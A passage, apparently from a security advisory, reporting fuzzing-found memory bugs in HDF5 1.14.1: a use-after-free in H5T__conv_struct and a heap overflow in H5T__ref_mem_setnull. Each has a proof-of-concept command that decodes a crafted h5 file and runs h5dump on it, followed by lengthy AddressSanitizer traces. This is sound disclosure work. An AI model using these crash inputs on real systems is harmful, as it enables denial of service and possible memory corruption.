    #2 0x7f79106b0b07 in H5FL_blk_free /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:1067
    #3 0x7f7910591aa7 in H5D__typeinfo_term /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1505
    #4 0x7f7910591aa7 in H5D__typeinfo_term /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1494
    #5 0x7f7910591aa7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:430
    #6 0x7f7910b48ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #7 0x7f7910b18afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #8 0x7f7910b18afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #9 0x7f7910507a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #10 0x7f791050f444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #11 0x558ffe91546c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #12 0x558ffe92a18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #13 0x558ffe8e3c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #14 0x558ffe8ec947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #15 0x7f79106f214e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #16 0x7f79106f214e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #17 0x7f7910703212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #18 0x7f791047d721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #19 0x7f791048105e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #20 0x7f7910711c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #21 0x7f791070a3d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #22 0x7f79106f4d71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #23 0x7f79107acc0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #24 0x7f7910b54455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #25 0x7f7910b2b095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #26 0x7f7910b2b095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #27 0x7f791079861a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #28 0x7f791079861a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #29 0x558ffe8e2be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #30 0x558ffe8db1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #31 0x7f79100afd09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)

previously allocated by thread T0 here:
    #0 0x7f7910f06e8f in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x7f79106b02ef in H5FL__malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:237
    #2 0x7f79106b14f3 in H5FL_blk_malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:888
    #3 0x7f7910590dd4 in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1468
    #4 0x7f791059341b in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:424
    #5 0x7f791059341b in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:305
    #6 0x7f7910b48ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #7 0x7f7910b18afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #8 0x7f7910b18afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #9 0x7f7910507a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #10 0x7f791050f444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #11 0x558ffe91546c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #12 0x558ffe92a18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #13 0x558ffe8e3c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #14 0x558ffe8ec947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #15 0x7f79106f214e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #16 0x7f79106f214e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #17 0x7f7910703212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #18 0x7f791047d721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #19 0x7f791048105e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #20 0x7f7910711c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #21 0x7f791070a3d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #22 0x7f79106f4d71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #23 0x7f79107acc0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #24 0x7f7910b54455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #25 0x7f7910b2b095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #26 0x7f7910b2b095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #27 0x7f791079861a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #28 0x7f791079861a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #29 0x558ffe8e2be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #30 0x558ffe8db1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #31 0x7f79100afd09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)

SUMMARY: AddressSanitizer: heap-use-after-free ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
Shadow bytes around the buggy address:
  0x0fefa15020b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fefa15020c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fefa15020d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fefa15020e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fefa15020f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0fefa1502100: fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fefa1502110: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fefa1502120: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fefa1502130: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fefa1502140: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fefa1502150: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==1205==ABORTING

H5T__conv_struct Use After Free

Details

The following heap-use-after-free was found by fuzzing the h5dump helper utility. An attacker who can supply a malicious h5 file can trigger a heap use-after-free. The freed object is referenced in a memmove call from H5T__conv_struct. The original object was allocated by H5D__typeinfo_init_phase3 and freed by H5D__typeinfo_term.

PoC

The following PoC shows the ASAN output detailing the use-after-free condition.

$ echo "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" | base64 -d | gunzip -c > 11049a56a4235093e6845a27021af15e 
$ ./hdf5/bin/h5dump 11049a56a4235093e6845a27021af15e 
HDF5 "11049a56a4235093e6845a27021af15e" {
GROUP "/" {
   DATASET "ArrayOfStructures" {
      DATATYPE  H5T_COMPOUND {
         32-bit big-endian integer 32-bit precision "a_name";
         H5T_IEEE_F32LE "b_name";
         64-bit little-endian floating-point 64-bit precision "c_name";
         H5T_COMPOUND {
            H5T_STRING {
               STRSIZE 35329;
               STRPAD H5T_STR_NULLTERM;
               CSET H5T_CSET_ASCII;
               CTYPE H5T_C_S1;
            } "char_name";
            H5T_ARRAY { [2] 96-bit big-endian floating-point 32-bit precision } "array_na";
         } "d_name";
      }
      DATASPACE  SIMPLE { ( 545460846846 ) / ( 545460846846 ) }
=================================================================
==1167==ERROR: AddressSanitizer: heap-use-after-free on address 0x7fae4edbcec4 at pc 0x7fae5549f541 bp 0x7fffb9b82400 sp 0x7fffb9b81bb0
READ of size 35329 at 0x7fae4edbcec4 thread T0
    #0 0x7fae5549f540 in __interceptor_memmove ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789
    #1 0x7fae54ff94dd in H5T__conv_struct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2314
    #2 0x7fae54fc687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #3 0x7fae54ff9b02 in H5T__conv_struct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2339
    #4 0x7fae54fc687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #5 0x7fae54ba8b3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
    #6 0x7fae54b66221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
    #7 0x7fae54b9c5d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
    #8 0x7fae55151ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #9 0x7fae55121afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #10 0x7fae55121afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #11 0x7fae54b10a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #12 0x7fae54b18444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #13 0x55beb9eaf46c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #14 0x55beb9ec418d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #15 0x55beb9e7dc9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #16 0x55beb9e86947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #17 0x7fae54cfb14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #18 0x7fae54cfb14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #19 0x7fae54d0c212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #20 0x7fae54a86721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #21 0x7fae54a8a05e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #22 0x7fae54d1ac79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #23 0x7fae54d133d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #24 0x7fae54cfdd71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #25 0x7fae54db5c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #26 0x7fae5515d455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #27 0x7fae55134095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #28 0x7fae55134095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #29 0x7fae54da161a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #30 0x7fae54da161a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #31 0x55beb9e7cbe4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #32 0x55beb9e751c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #33 0x7fae546b8d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
    #34 0x55beb9e77649  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x23649)

0x7fae4edbcec4 is located 800452 bytes inside of 1048584-byte region [0x7fae4ecf9800,0x7fae4edf9808)
freed by thread T0 here:
    #0 0x7fae5550fb6f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:123
    #1 0x7fae54cb7d3e in H5FL__blk_gc_list /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:1203
    #2 0x7fae54cb9b07 in H5FL_blk_free /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:1067
    #3 0x7fae54b9aaa7 in H5D__typeinfo_term /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1505
    #4 0x7fae54b9aaa7 in H5D__typeinfo_term /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1494
    #5 0x7fae54b9aaa7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:430
    #6 0x7fae55151ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #7 0x7fae55121afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #8 0x7fae55121afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #9 0x7fae54b10a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #10 0x7fae54b18444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #11 0x55beb9eaf46c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #12 0x55beb9ec418d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #13 0x55beb9e7dc9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #14 0x55beb9e86947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #15 0x7fae54cfb14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #16 0x7fae54cfb14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #17 0x7fae54d0c212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #18 0x7fae54a86721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #19 0x7fae54a8a05e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #20 0x7fae54d1ac79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #21 0x7fae54d133d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #22 0x7fae54cfdd71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #23 0x7fae54db5c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #24 0x7fae5515d455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #25 0x7fae55134095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #26 0x7fae55134095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #27 0x7fae54da161a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #28 0x7fae54da161a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #29 0x55beb9e7cbe4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #30 0x55beb9e751c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #31 0x7fae546b8d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)

previously allocated by thread T0 here:
    #0 0x7fae5550fe8f in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x7fae54cb92ef in H5FL__malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:237
    #2 0x7fae54cba4f3 in H5FL_blk_malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:888
    #3 0x7fae54b99dd4 in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1468
    #4 0x7fae54b9c41b in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:424
    #5 0x7fae54b9c41b in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:305
    #6 0x7fae55151ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #7 0x7fae55121afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #8 0x7fae55121afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #9 0x7fae54b10a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #10 0x7fae54b18444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #11 0x55beb9eaf46c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #12 0x55beb9ec418d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #13 0x55beb9e7dc9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #14 0x55beb9e86947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #15 0x7fae54cfb14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #16 0x7fae54cfb14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #17 0x7fae54d0c212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #18 0x7fae54a86721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #19 0x7fae54a8a05e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #20 0x7fae54d1ac79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #21 0x7fae54d133d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #22 0x7fae54cfdd71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #23 0x7fae54db5c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #24 0x7fae5515d455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #25 0x7fae55134095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #26 0x7fae55134095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #27 0x7fae54da161a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #28 0x7fae54da161a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #29 0x55beb9e7cbe4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #30 0x55beb9e751c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #31 0x7fae546b8d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)

SUMMARY: AddressSanitizer: heap-use-after-free ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
Shadow bytes around the buggy address:
  0x0ff649daf980: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0ff649daf990: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0ff649daf9a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0ff649daf9b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0ff649daf9c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0ff649daf9d0: fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd
  0x0ff649daf9e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0ff649daf9f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0ff649dafa00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0ff649dafa10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0ff649dafa20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==1167==ABORTING

Heap Buffer Overflow

Summary

An attacker who can control an h5 file parsed by HDF5 can trigger write-based heap buffer overflow conditions. This can lead to a denial-of-service condition and potentially further issues such as remote code execution, depending on the practical exploitability of the heap overflows against modern operating systems. Real-world exploitability of these issues in terms of remote code execution is currently unknown.

H5T__ref_mem_setnull Heap Buffer Overflow

Details

The following write-based heap overflow was found by fuzzing the h5dump and h5stat helper utilities. An attacker who can supply a malicious h5 file can trigger an out-of-bounds write in the H5T__ref_mem_setnull method. As the H5T__ref_mem_setnull method is responsible for overwriting target buffers with null bytes, the overflowing write is a memset of null bytes rather than attacker-controlled data, and the likelihood of exploitability for remote code execution is reduced.

PoC

The following snippet details the PoC test case and the AddressSanitizer output:

$ echo "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" | base64 -d | gunzip -c > 0e71c9cac751ed2550aee102e2956181 
$ ./hdf5/bin/h5dump 0e71c9cac751ed2550aee102e2956181 
HDF5 "0e71c9cac751ed2550aee102e2956181" {
GROUP "/" {
   DATASET "Dataset1.0" {
      DATATYPE  H5T_STRING {
         STRSIZE H5T_VARIABLE;
         STRPAD H5T_STR_NULLTERM;
         CSET H5T_CSET_ASCII;
         CTYPE unknown_one_character_type;
      }
      DATASPACE  SIMPLE { ( 4 ) / ( 4 ) }
      DATA {h5dump error: unable to print data

      }
=================================================================
==1090==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000005b40 at pc 0x7f4b61c17269 bp 0x7ffff0d71450 sp 0x7ffff0d70c00
WRITE of size 64 at 0x602000005b40 thread T0
    #0 0x7f4b61c17268 in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778
    #1 0x7f4b61881782 in H5T__ref_mem_setnull /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tref.c:394
    #2 0x7f4b6177984f in H5T__conv_ref /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3758
    #3 0x7f4b6173e87a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #4 0x7f4b6130e117 in H5D_get_create_plist /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dint.c:3667
    #5 0x7f4b618ca8a4 in H5VL__native_dataset_get /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:466
    #6 0x7f4b6189bcfa in H5VL__dataset_get /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2426
    #7 0x7f4b6189bcfa in H5VL_dataset_get /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2457
    #8 0x7f4b6128f1e6 in H5Dget_create_plist /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:776
    #9 0x5568d72ae733  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29733)
    #10 0x5568d72b7947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #11 0x7f4b6147314e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #12 0x7f4b6147314e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #13 0x7f4b61484212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #14 0x7f4b611fe721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #15 0x7f4b6120205e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #16 0x7f4b61492c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #17 0x7f4b6148b3d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #18 0x7f4b61475d71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #19 0x7f4b6152dc0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #20 0x7f4b618d5455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #21 0x7f4b618ac095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #22 0x7f4b618ac095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #23 0x7f4b6151961a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
